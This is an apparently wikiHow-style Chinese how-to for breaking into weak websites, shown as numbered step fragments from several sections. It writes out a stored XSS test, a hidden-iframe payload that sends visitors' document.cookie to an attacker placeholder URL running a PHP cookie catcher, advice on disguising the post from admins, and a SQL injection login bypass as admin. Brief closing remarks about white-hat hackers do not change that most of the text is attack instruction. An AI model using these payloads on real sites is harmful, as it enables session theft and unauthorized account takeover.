2

创建帖子。要在帖子内容中输入一些内容，这样不管谁点击了帖子，数据都会被窃取。

• 你可以测试一下，看看该网站系统会不会过滤代码。在帖子中输入<script...>alert(“test”)</...script> （把句点删掉）。如果点击帖子的时候，会出现一个警告窗口，说明站点易受攻击。

3

创建并上传cookie捕捉器。本攻击的目的是窃取用户的cookie内容，通过cookie内容，你就可以轻松登录安全性弱的网站，进入对方的账户。这里你需要准备cookie捕捉器（某种代码），这个代码会捕捉用户的cookie并转发出去，你可以给一个可以登录的，又支持PHP网页的网站上传一个捕捉器。例子里有个cookie捕捉器供参考。

4

将帖子和cookie捕捉器一起发布出去。输入一定的代码，就可以让帖子抓取用户的cookie，并发送到你的网站中去。你需要在代码之后输入一些文字，减少访客的怀疑，并减少管理员删帖的几率。

• cookie捕捉器的例子：<...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”YOURURL/cookiecatcher.php?c=”+document.cookie)><.../iframe>（将句点删掉。）

5

使用抓取的cookies。之后就可以将抓取的cookie发送到你的网站，你可以随意使用对方的cookies了。

2

以管理员身份登录。输入admin作为用户名，然后用数字或一串字母作为密码登录进去。密码可能是任何数字和字母的组合，但最常见的例子有1’或’1’=’1。

3

耐心点。可能会试错几次密码，所以要久一点。

4

进入网站。最后就可以以某个密码登录进安全性低的网站，进行入侵了。

2

学好HTML基础知识。你也需要对HTML和javascript有很好的了解，这样就能针对性地破解某些网页了。这些代码需要一段时间的学习，不过网上有很多很好的学习资料，要是你仔细找的话，不愁找不到的。

3

咨询白帽黑客。白帽黑客是身具黑客知识，把能力发挥在正当之处的特殊黑客。白帽黑客会曝光安全漏洞，还会让互联网更稳定实用。要是你也想发挥正义的力量，或者想保护自家网站的安全，你可以咨询一些白帽黑客了解一些建议。

4

做做研究。想了解怎么入侵网站，或者想要保护自己的网站，你需要做很多研究工作。网站受攻击的方式有很多种的，所以要坚持学习相关知识。